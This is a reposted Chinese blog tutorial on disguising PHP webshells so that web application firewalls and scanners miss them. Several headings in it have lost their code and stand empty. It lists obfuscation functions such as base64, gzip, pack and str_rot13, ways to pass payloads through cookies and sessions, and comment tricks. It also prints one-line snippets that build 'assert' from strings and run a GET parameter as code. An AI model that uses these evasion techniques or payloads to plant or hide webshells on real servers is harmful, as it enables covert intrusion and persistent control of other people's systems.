文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

免杀学习——PHP免杀

2023-09-04 10:20

关注

php马作为最常用的上马方式之一,各类waf对其的防护与检测也在不断完善

相信各位在对一些网站渗透测试中碰到过传马被删或者被拦的情况,刚好最近整理了一些php免杀方法,下面来分享一下

字符串类

字符串拼接:

base64加密:

函数绕过:

ucwords()  //把每个单词的首字符转换为大写ucfirst()  //首字符转换为大写trim()  //移除字符串两侧的字符substr_replace() //函数把字符串的一部分替换为另一个字符串substr()  //函数返回字符串的一部分strtr()  //函数转换字符串中特定的字符strtoupper()  //把所有字符转换为大写strtolower()  //把所有字符转换为小写strtok()  //函数把字符串分割为更小的字符串str_rot13()  //函数对字符串执行 ROT13 编码chr()  //从指定 ASCII 值返回字符hex2bin() //把十六进制值转换为 ASCII 字符bin2hex() //ASCII 字符的字符串转换为十六进制值gzcompress()、gzdeflate()、gzencode()  //字符串压缩gzuncompress()、gzinflate()、gzdecode()  //字符串解压base64_encode()  //base64编码base64_decode()  //nase64解码pack()  //数据装入一个二进制字符串unpack()  //从二进制字符串对数据进行解包

不常见函数:

gzcompress() //此函数使用数据格式压缩给定的字符串pack() //将输入参数打包成 format 格式的二进制字符串。openssl_encrypt() //使用给定的方法和密钥加密给定的数据,返回原始或 base64 编码字符串

使用

gzcompress():

pack():

$test=pack("H14","706870696e666f");$a = "a";$s = "s";$c=$a.$s.$_GET["test2"];$c($test);#assert(phpinfo())

openssl_encrypt:

传参绕过:

cookie:

之后通过burp抓包修改PHPSESSID即可

session:

burp通过cookie添加session,之后取出session

特征绕过

替换

[] {}[] foreach

魔术方法:

__FILE__:返回当前文件的绝对路径(包含文件名)。__CLASS__:返回当前的类名(包括该类的作用区域或命名空间)。__NAMESPACE__:返回当前文件的命名空间的名称

自动免杀:掩日免杀(分离)(网络)

不常见的:

注释和空白符绕过:

类方法调用:

demo()($_GET[1]);

类的静态方法:

总结:

php上马免杀,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习

推荐大家去看一下这位师傅的文章php免杀合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细

来源地址:https://blog.csdn.net/ZxC789456302/article/details/127473366

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯